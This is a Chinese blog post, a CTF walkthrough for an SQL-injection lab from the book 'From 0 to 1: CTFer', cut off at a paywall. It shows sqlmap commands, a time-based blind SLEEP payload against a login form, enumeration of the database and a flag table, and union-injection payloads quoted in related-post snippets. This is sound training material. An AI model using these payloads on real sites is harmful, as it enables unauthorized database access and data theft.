《从0到1:CTFer成长之路》书籍配套题目-[第一章 web入门]SQL注入-2

最新推荐文章于 2021-12-03 17:08:37 发布
最新推荐文章于 2021-12-03 17:08:37 发布
阅读量1k 收藏 7
点赞数 3
分类专栏: 网络安全 学习笔记 《从0到1:CTFer成长之路》 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46703850/article/details/113778529
版权

[第一章 web入门]SQL注入-2


介绍:记录一下笔记,方便以后迅速回忆使用。

《从0到1:CTFer成长之路》书籍配套题目,来源网站:《从0到1:CTFer成长之路》

一、信息收集

1.首页

  • …/login.php
    在这里插入图片描述

2.登录成功会跳转到

  • …/user.php
    在这里插入图片描述

3.进行测试判断

[1].先用Burp suite抓包看一下
提交的信息有

name=user&pass=passwd

二、尝试破解

1.用post型的sqlmap破解

<1>.首先,开burp截包

<2>.输入username,passwd,提交。

可以看见,burp已经把id获取到了

<3>.copy to file,保存为txt文件,放到sqlmap的目录,(MyFile/bf.txt)

<4>.开始跑sqlmap破解

python sqlmap.py -r MyFile/bf.txt
  • 结果
---
Parameter: name (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=username' AND (SELECT 1848 FROM (SELECT(SLEEP(5)))DRxp) AND 'PkUZ'='PkUZ&pass=passwd
---

成功找到注入点,那剩下的就按步就班

<5>.按步就班

[1].sqlmap爆当前数据库信息
python sqlmap.py -r MyFile/bf.txt --current-db

[10:10:29] [INFO] adjusting time delay to 1 second due to good response times
note
current database: 'note'

用sqlmap爆出库名:note

[2].sqlmap.列出指定数据库所有的表名
python sqlmap.py -r MyFile/bf.txt -D note --tables

[10:14:41] [INFO] retrieved:
[10:14:47] [INFO] adjusting time delay to 1 second due to good response times
fl4g
[10:15:02] [INFO
最低0.47元/天 解锁文章
一个平凡de人
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
《从0到1:CTFer成长之路SQL注入-2
tr_trTTT的博客
04-13 3279
前言: 我是新手小白,创建此文章只为了记录自己的学习 题目: 我们先进入环境,既然是sql注入,那就可以通过手工或者sqlmap来进行注入 上面就是题目,有登录框,我们先用手工测试sql注入。 手工方法: 1. 随便输入一个账号试试: 输入admin显示账号或密码错误,输入其他显示账号不存在,所以这里可以判断账号是admin; 2.开始判断注入 ...
《从0到1:CTFer成长之路书籍配套题目(不定时更)
BvxiE的博客
07-01 580
放出提示: 使用dirbuster工具进行网页目录扫描,⼯具是kali⾃带, 用URL Fuzz,可以指定目录,指定扫描admin目录下面的所有文件,dir代表字典的每一行 或者 额,,,没扫出来,尝试自己直接做 得到提示,访问可得: 得到提示,访问可得:flag2:s_v3ry_im 会得到一个文件 这题看了wp,软件还是没整明白,过几天再试试。 Git测试,使用GitHack脚本对其进行测试,教程!kali有自带的Git、Python2和Python3。转战虚拟机…主要我下半天GitHac
《从0到1:CTFer成长之路书籍配套题目[第一章 web入门]SQL注入
wuyaowangchuan的博客
11-19 2019
这道题没有过滤,超级简单 文章目录手注sqlmap跑 进入环境 手注 b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1' http://b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1%27%20and%201=1%20%23 id=1%27%20and%201=2%20%23 说明是字符型注入 然后开始注入 ?id=1%27.
0到1 ctfer: SQL注入-2
Zeker62的博客
08-31 1945
分析这个靶场 : 登录靶场,只有一个空空的界面: 很明显,这是一个登录到账号密码的关于SQL注入题目 尝试输入admin和其他用户名,发现是不一样的报错: 说明这里的机制是:先检查账号是否存在,再检查账号和密码是否对应 由此可以使用burpsuite抓包进行报错注入的操作: 经过抓包,在burp上显示不同的内容: “账号不存在” “账号和密码错误” 所以由此可以判断出,账号密码是否正确,来源于报错: 用户名正确报错:{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5
第14天:WEB漏洞-SQL注入之类型及提交注入1
08-03
网络安全领域,SQL注入是一种常见的Web漏洞,攻击者通过向应用程序的输入字段中插入恶意的SQL代码,以篡改或获取数据库中的敏感信息。本文将详细介绍SQL注入的类型及其提交方式,以及如何进行安全测试。 首先,...
Secure-Systems-of-SQL-Injection-Attack:具有SQL注入漏洞的安全系统
05-01
SQL注入的典型用法是从数据库泄漏机密信息,绕过身份验证逻辑或向数据库中添加未经授权的帐户。 此安全性可防止未经授权访问您的数据库,还可以防止没有适当权限的用户更改或删除您的数据。 恶意文本检测器,约束...
第18天:WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
SQL 注入是一种常见的 WEB 漏洞攻击方式,通过将恶意 SQL 语句嵌入到 Web 应用程序的输入参数中,从而访问、修改或控制数据库的数据。堆叠注入(Stacked Injections)是 SQL 注入的一种特殊形式,即在一个 SQL 语句...
第17天:WEB漏洞-SQL注入之二次,加解密,DNS等注入1
08-03
网络安全领域,Web漏洞是常见的安全威胁之一,SQL注入是一种尤为危险的攻击方式。本文将深入探讨二次注入、加解密技术以及DNSlog注入的概念、原理,并通过具体案例和实际应用来阐述这些技术如何被利用。 **SQL...
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
读书笔记:从0到1.pdf
10-04
读书笔记:从0到1.pdf
从零开始SQL注入之二
tonghua6的专栏
03-21 507
转载自:http://lightless.me/archives/zero-to-n-sqli-2.html 0x00 废话 又是废话环节,今天我们就开始实战吧。当然这是不可能的,在开始之前我还要废话一些东西,不过离实战不远了。 0x01 理解SQL注入 怎么又是理解SQL注入,作者你是出来坑爹的吧! 不要慌,上一次我们只是通俗的讲了什么是SQL注入,大家
《从0到1:CTFer成长之路书籍配套题目-[第一章 web入门]任意文件读取漏洞
weixin_46703850的博客
02-23 1298
《从0到1:CTFer成长之路书籍配套题目,来源网站:[《从0到1:CTFer成长之路》](https://book.nu1l.com/)
《从0到1:CTFer成长之路SQL注入漏洞
weixin_43072923的博客
12-03 347
[第一章 web入门] SQL注入漏洞00.前言01.union注入:02. 布尔盲注03.总结 00.前言   这篇文章将展示获取该靶机flag的过程,并且通过对最典型的union注入和布尔盲注进行详细的分析。 启动环境 01.union注入:   根据首页的url我们可以看到疑似注入点‘id’,通过修改id值来判断是否存在注入:   首先通过添加单引号’判断是否存在注入,并确定其类型   发现内容发生改变,说明单引号成功闭合SQL语句,且是字符型;   猜测其语句为: select ... fr
简单的SQL注入2
雨九九的小窝
10-25 715
地址:http://ctf5.shiyanbar.com/web/index_2.php 参考资料:http://www.bubuko.com/infodetail-2301250.html 1.直接输入单引号,根据报错信息确定参数值类型为字符型 2.输入‘ or ‘1‘=‘1,直接报错,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入‘ ‘1‘=‘1, 仍然报错,信...
《从0到1:CTFer成长之路书籍配套题目:[第一章 web入门]SQL注入
weixin_43868349的博客
03-14 303
本次做题主要是记录一下手注的过程,同时回顾一下相关内容。 题目 进入环境 首先尝试找到注入点; 用and 1=1 和 and 1=2进行尝试 之后就可以开始注入了;用order by获取字段个数; 确定回显位置; payload: ?id=-1' union select 1,2,3 %23 确定位置后就是获取数据库名; payload: ?id=-1' union select 1,database(),3 %23 接下来就是确定表名; payload: ?id=-1' union
《从0到1:CTFer成长之路书籍配套题目-[第一章 web入门]SQL注入-1
weixin_46703850的博客
02-09 986
《从0到1:CTFer成长之路书籍配套题目,来源网站:[《从0到1:CTFer成长之路》](https://book.nu1l.com/)
从0到1ctfer成长之路配套逆向题 babyconst
qq_35576225的博客
11-07 498
来源:https://book.nu1l.com/tasks/#/pages/reverse/5.4 1.用ida打开发现是输入一个48位的字符串加密后进行比较。 2.发现第一个函数中涉及到了一些常数,用para检查后发现是属于md5加密。 3.分析后发现603080位置开始存放着加密后的字符串,正好每次地址位置差16也就是16进制的十,每个地址保存着一个字节也就是8位,是四个字符加密后形成了32位。 4.找到一个在线的md5解码网站,查询后还原得到4位,重复12次后,得到fla
《从0到1:CTFer成长之路题目SQL注入-1
weixin_46801402的博客
11-21 657
《从0到1:CTFer成长之路题目SQL注入-1
从0到1:CTFer成长之路 sql注入1
最新发布
07-27
CTFer成长之路中,SQL注入是一个重要的技术点。SQL注入是一种利用用户输入数据不当,从而欺骗数据库执行恶意操作的攻击方式。在CTF比赛中,了解和掌握SQL注入技术可以帮助你解决一些与数据库相关的题目。 首先,你需要了解SQL注入的原理和基本概念。SQL注入通常发生在应用程序与数据库之间的交互过程中。当应用程序未能正确过滤用户输入数据,并且将用户输入直接拼接到SQL查询语句中时,攻击者可以通过构造恶意输入来修改、删除或绕过原本应该执行的查询操作,从而获取敏感信息或控制数据库。 接下来,你需要学习一些常见的SQL注入技巧和工具。例如,可以使用单引号 `'` 来进行字符串注入,使用注释符 `--` 来注释掉原本的查询语句,使用 UNION 语句来进行查询结果的合并等等。同时,了解一些常见的防御措施,如参数化查询、输入验证和输出编码等,可以帮助你更好地理解和应对SQL注入攻击。 在实践中,你可以尝试挑战一些有关SQL注入的CTF题目。这些题目通常会提供一个具有漏洞的应用程序和一个数据库,你需要通过利用SQL注入漏洞来获取敏感信息或执行特定操作。通过解决这些题目,你可以加深对SQL注入的理解,并且熟悉常见的攻击场景和解决方法。 最后,记得在学习和实践过程中保持合法合规。只在合法授权的情况下进行演练和挑战,切勿用于非法用途。同时,及时更新和修补应用程序的漏洞,以保护自己和他人的信息安全。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值